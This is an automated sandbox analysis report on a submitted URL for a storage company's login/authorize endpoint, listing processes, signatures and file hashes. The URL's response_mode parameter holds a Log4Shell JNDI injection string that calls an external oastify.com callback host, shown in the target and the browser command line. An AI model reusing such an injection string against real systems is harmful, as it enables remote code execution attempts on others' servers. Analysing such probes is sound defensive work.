Overview

overview

1

Static

static

URLScan

urlscan

1

http://PUBLICSTORAGE...

windows7-x64

1

http://PUBLICSTORAGE...

windows10-2004-x64

1

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    29/10/2022, 01:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://PUBLICSTORAGE.COM/myaccount/identity/connect/authorize?client_id=ps.website.external.client.local&redirect_uri=https://www.publicstorage.com&response_mode=${jndi:ldap://514cz0sjptvokcxl4ypzyzly3p9fx4.oastify.com/a}&response_type=id_tokentoken&scope=openidprofileps.website.resource.default&state=openidconnect.authenticationproperties=vhz6lk1nukbhq67qltln6jvl7-qwiz3ellvvk61brr5_kcv_irm3jajyg0qygq_ar6biqd8d-q7unsrakiousyulb6aykuc4achyyibqq9hqrxhkdnunc1thl5qku5wfyhfzofc9v32scloovp5v6vz04syge3wsezkvm3by2gahvgivzylt9qgh9srza6vg9yylg2dpqo1y_ydfcyy6q5q4pxpaoegbh2pk1mhaeehb6kby1kgwqvxiz0-ydayzmg4znbsmklaost1gt4fuopb3tmurfrq7yshvd0utxz-enlirljufbmx-csgwx4kky3z8hm_evsfwtzuxfqwmlq&nonce=638024130977957441.zmzkody2zgqty2u3yi00njrmlthjntutotizy2uzzdlhogniowu5owi3mtutotewzs00mdnjlweyzdctnduwyji0mjrlodu1&acr_values=employeeid:-15&x-client-sku=id_net&x-client-ver=1.0.40306.15

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 38 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://PUBLICSTORAGE.COM/myaccount/identity/connect/authorize?client_id=ps.website.external.client.local&redirect_uri=https://www.publicstorage.com&response_mode=${jndi:ldap://514cz0sjptvokcxl4ypzyzly3p9fx4.oastify.com/a}&response_type=id_tokentoken&scope=openidprofileps.website.resource.default&state=openidconnect.authenticationproperties=vhz6lk1nukbhq67qltln6jvl7-qwiz3ellvvk61brr5_kcv_irm3jajyg0qygq_ar6biqd8d-q7unsrakiousyulb6aykuc4achyyibqq9hqrxhkdnunc1thl5qku5wfyhfzofc9v32scloovp5v6vz04syge3wsezkvm3by2gahvgivzylt9qgh9srza6vg9yylg2dpqo1y_ydfcyy6q5q4pxpaoegbh2pk1mhaeehb6kby1kgwqvxiz0-ydayzmg4znbsmklaost1gt4fuopb3tmurfrq7yshvd0utxz-enlirljufbmx-csgwx4kky3z8hm_evsfwtzuxfqwmlq&nonce=638024130977957441.zmzkody2zgqty2u3yi00njrmlthjntutotizy2uzzdlhogniowu5owi3mtutotewzs00mdnjlweyzdctnduwyji0mjrlodu1&acr_values=employeeid:-15&x-client-sku=id_net&x-client-ver=1.0.40306.15
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1104
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1104 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:856

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    Filesize

    1KB

    MD5

    89faa4131e0e314a2a8a17045cd6278b

    SHA1

    39b77d3ba6ec3b13695cbc7d544e7a7e20417057

    SHA256

    7c6a61dc49b002c0593f17459453dd793042601ae51905c85540ed6f3d5e75ee

    SHA512

    310e433e2d3406e919b6884f695c90a121234d76b275efa3d5f7c9f42e5ea53fb7b88eff0f10df4bae43f2a41f9f76213b8448761c92e6e50ed2567ea5e14488

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    Filesize

    446B

    MD5

    99ddb4271347f83fa0434b12580d91a8

    SHA1

    5e2db41075677061f1c0f1776ad27b3de76ef2cb

    SHA256

    dccf364bfa3daac6031dc928a8221f31dc77e7c4537e853bc6e4975d555c2d4c

    SHA512

    2f4a591a7dfcd77a82877e2fda17aef0f3b0ef0faf88a4dd16b80d91cf91b8ab9a80a532973d5414d672330812c3d6eeece4f1ebb9f504b3c6ff93c023a73a8a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    1ee6d646e028998731f17e37b6109942

    SHA1

    6bb4a9bde8cc14d39b17c9b86eee477d121e65f6

    SHA256

    7fc140455ea9a3323d381219f6fe0b2906a910887a239d531c257332ca15575f

    SHA512

    034fd47496144f6dea7d422af3d97d1434092c2ffe62813c1963e59aa8c746a40d2f5a559cf52745397e820442177c37bcdc989624abd2c3c4d496fef86d9101

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
    Filesize

    8KB

    MD5

    c212b34972cffea14dd0ebfccc438748

    SHA1

    7ae4523aa9ffe2dc274b4f55f86abd4355b78604

    SHA256

    d9a9a27342f74575f18e47a8d0b7e19449cfddbce417cfacef041415820f7c4d

    SHA512

    b4cb0d871892d4b59ea7434fe68008fb9797ee4299c683536d734dae0f38df10cac5905abd9253ddfc84f7527b2c0c1e10b71bb94ca46b95ee4d66d34a15772a

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\309axvf\imagestore.dat
    Filesize

    12KB

    MD5

    f2231980c347161044a367feceef76a2

    SHA1

    fab70acbcccb3c0eb36ed166ec4b2a4078cecbd8

    SHA256

    74aea6bfa275dcc79ee4bed5ac99a629f04de31f245ed8f6721059db6a82c47b

    SHA512

    1a020b9b53941d59362e48f68f25e00066911b70f93b102b9881795a17ceeee4e1b71ea21d251f179a04cec08aeb37860c4fa9d50c560762d04ed2354ccad693

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\45FW34N6.txt
    Filesize

    603B

    MD5

    64bcfa2d8a8f62894ca99e8ebe06c093

    SHA1

    976b589cbb1d93ec7880cd27a58bd6db76e40a9c

    SHA256

    76ec17032500a88239e91f9ae2094d0ca1cf147c149b0265b9ee902ec5eb6e96

    SHA512

    0a2d1f1e3a03147afd550837450a4407d735371b74dfbd4d9fba5a80aaac3ad6151b10a83bc4b380d71a6e2e2ea0a9a661589ab714537caad4a203a43806c37c

    Download Submit